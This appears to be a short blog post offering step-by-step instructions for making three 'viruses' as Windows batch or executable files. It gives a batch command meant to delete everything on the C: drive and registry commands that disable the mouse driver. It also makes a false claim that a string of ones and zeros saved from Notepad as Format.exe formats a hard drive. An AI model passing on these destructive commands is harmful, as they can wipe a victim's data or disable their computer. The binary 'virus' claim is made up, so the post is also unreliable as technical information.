0
How to Make a Computer Virus >>>Virus that format C: Drive: 1. OpenNotepadand copy belowcodeinto it. @Echo off Del C:\ *.* |y 2. Save this file as virus.bat(Name can be anything but .bat is must) 3. Now, running this file will deleteall the content ofC Drive. >>>Virus that Disable Mouse: *. OpenNotepadand copy below codes rem --------------------------------- remDisable Mouse set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4 rem --------------------------------- *.Save this file as virus.bat *.Done you just created your virus. >>>Virus that create binary virus to format HARDDIsK: 1. Copy the below codes intoNotepad. 01001011000111110010010101010101010000011111100000 2. Savethe fileasFormat.exe 3. You just createdvirusto format Hard Drive. Enjoy !!! Warning: Please don't try to run on your own computer or else it willdelete allthe content of your C Drive. I will not be responsible for any damage done to your computer.

Post a Comment

 
Top